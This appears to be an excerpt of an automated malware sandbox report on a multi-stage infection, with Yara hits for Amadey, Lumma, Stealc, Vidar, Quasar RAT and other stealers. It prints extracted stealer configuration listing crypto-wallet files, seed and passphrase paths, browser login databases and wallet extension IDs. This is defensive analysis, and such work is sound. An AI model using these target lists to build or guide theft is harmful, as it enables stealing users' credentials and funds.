Code function: 1_2_6C4B1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

1_2_6C4B1C30

Source: K1T78D2510W1E77KV3WDUQ9M.exe, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2149221890.0000000000A7E000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: Program Manager
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe, 00000003.00000002.1942834590.0000000000C22000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1995778849.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2007773289.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: hWProgram Manager

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C58AE71 cpuid

1_2_6C58AE71

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1081729001\spoDnGT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1081729001\spoDnGT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1081819001\kzTq7Bt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1081819001\kzTq7Bt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Users\user\AppData\Roaming\SubDir\services.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Users\user\AppData\Roaming\SubDir\services.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C58A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_6C58A8DC

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C4D8390 NSS_GetVersion,

1_2_6C4D8390

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: random.exe, random.exe, 00000000.00000003.1768974539.0000000005A02000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1769946830.0000000005A05000.00000004.00000800.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2765140937.0000000000E50000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 11.2.skotes.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.skotes.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2931305944.0000000000B11000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1995703148.0000000000B11000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2007463979.0000000000B11000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: 19.2.GWZ8arC.exe.3999550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.GWZ8arC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.GWZ8arC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2759274946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1689374040.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Poverty Stealer

Source: Yara match	File source: 48.0.0LGvvQO.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.0LGvvQO.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000030.00000000.2807373996.0000000000367000.00000002.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2935102839.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2866371712.0000000000367000.00000002.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2806966885.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2806821084.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 8000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0LGvvQO.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0LGvvQO[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe, type: DROPPED

Yara detected Quasar RAT

Source: Yara match	File source: 28.2.28qbTrm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.28qbTrm.exe.4219970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2941190811.00000000036B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2687425992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 28qbTrm.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: services.exe PID: 7272, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000003.1862642790.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2150281200.000000000115E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2148871243.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428, type: MEMORYSTR

Yara detected XenoRAT

Source: Yara match	File source: 13.2.KQlljCB.exe.23e5364b060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KQlljCB.exe.23e5364b060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2766783072.0000023E5363D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KQlljCB.exe PID: 3180, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: random.exe, 00000000.00000003.1769992828.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: random.exe, 00000000.00000003.1769992828.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\.
Source: random.exe	String found in binary or memory: "*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.j
Source: random.exe, 00000000.00000003.1769992828.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000734000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: random.exe, 00000000.00000003.1769992828.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000765000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: info.seco
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000734000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000765000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.jsonP
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoret
Source: random.exe, 00000000.00000003.1769992828.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: random.exe, 00000000.00000003.1779549873.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000765000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: file__0.localstorage
Source: random.exe, 00000000.00000003.1757292743.0000000000B56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000765000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000765000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: MultiDoge
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2148871243.0000000000765000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: seed.seco
Source: random.exe, 00000000.00000003.1757464098.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\.A

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
